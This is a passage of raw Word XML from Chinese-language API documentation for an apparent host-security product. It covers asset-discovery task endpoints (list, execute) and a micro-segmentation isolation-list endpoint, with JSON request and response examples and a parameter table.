        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "maxParallelism": 30,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "maxRate": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "taskInterval": 6.0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ipList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cronExpression": "10 00 * * *"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7696C3FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EA0F44" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5fdaca26398e682e95d9d3f4"    // 被修改的任务id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E586077" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54"/>
    <w:p w14:paraId="1F79C159" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="212" w:name="查询任务列表"/>
      <w:bookmarkEnd w:id="211"/>
      <w:r>
        <w:t>查询任务列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFB4096" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE97861" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assetdiscovery/job/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BC22CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8F7B78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t xml:space="preserve"> 筛选项都是选填字段，如果要列出所有的任务则以下字段传空值即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67808D7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"name": "test_7",    // 任务名称，支持模糊查询</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"scanType": [        // 扫描方式</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C13859" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149B87CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "specId": "5fcf34458780f401ba8d63e9",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "jobId": "5fd9fb70398e682e95d9ccde",  // 执行任务的jobid</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "lix_externalapi_test_7",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "progress": 1.0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "kind": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "values": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "scanType": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": 2,    // 任务状态 0：待执行 1：执行中 2：执行完成</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "lastScanTime": 1608121200638    // 该任务上一次执行时间</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1,    // 总条数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB5724E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="213" w:name="执行任务-2"/>
      <w:bookmarkEnd w:id="212"/>
      <w:r>
        <w:t>执行任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EEE1F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5FB371" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assetdiscovery/job/execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2173F9C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7942075A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "specId": "5fcf34458780f401ba8d63e9"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75211382" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F66056" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "id": "5fd9fb70398e682e95d9ccde"    // 返回执行任务的jobid</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA6B54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54"/>
    <w:p w14:paraId="1454562D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="214" w:name="微隔离一键隔离接口"/>
      <w:bookmarkEnd w:id="205"/>
      <w:bookmarkEnd w:id="207"/>
      <w:bookmarkEnd w:id="213"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>微隔离一键隔离接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027ABBF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="215" w:name="查询一键隔离列表"/>
      <w:r>
        <w:t>查询一键隔离列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3989AE60" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F362D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/ms-srv/api/segmentation/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21235A93"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173"/>
        <w:gridCol w:w="902"/>
        <w:gridCol w:w="926"/>
        <w:gridCol w:w="7081"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="72F4DF0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456811B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65A3E27D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B34D503" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14DCBABF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3E33BEE6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="371C8E0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D8223EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64A8EC19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F767358" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="64E5D200" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="622F65C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F607688" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42B0272F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ADBFF80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>隔离方向,in:入站，out：出站，all：全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="70B40B82" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FB6379E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C809EA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D529ED2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05A39C69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>隔离状态,1：隔离中,2：隔离成功,3：隔离失败,4：修改中,5：修改失败,6：解除中,7：解除失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="52DE6A85" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="462A703D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6520B14B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="323E81FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="230D5E11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="485FB187" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39A960EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31F88AE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26F50D0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22022C06" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="248A1ACF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A2A6F99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6907F51B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7152F34F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="164D0A20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>分页的页数，默认0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="79A9BDEE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61333EFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0603FD7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="621FE013" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BE41FED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>分页的大小，默认50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5621C0F7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FE856F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sorts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F5CECD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AF5D27B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4398C09B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>排序字段,多个用逗号隔开,sorts字段的约定不写表示升序，"-"表示降序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67F4A895" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF448B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/ms-srv/api/segmentation/list?page=0&amp;size=50&amp;groups=1,2&amp;sorts=updatedTime,-hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4995DC6F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15366D43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "61d7b2de27b7b26916736511",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "5fa27259dae9af8a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "updatedTime": 1641525982,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "123456",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remoteLoginEnabled": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "192.168.253.128",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIpBak": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "localhost.localdomain",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "groupName": "未分组主机",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "onlineStatus": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "ipList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "192.168.1.100",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "172.16.2.187"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "portList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "80",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "81",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "82"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "operation": "micro_segmentation_add",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "error": "主机离线",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "direction": "out"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A5C22"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2212"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="7093"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="26EF019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C7D786A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74816235" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22A17415" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
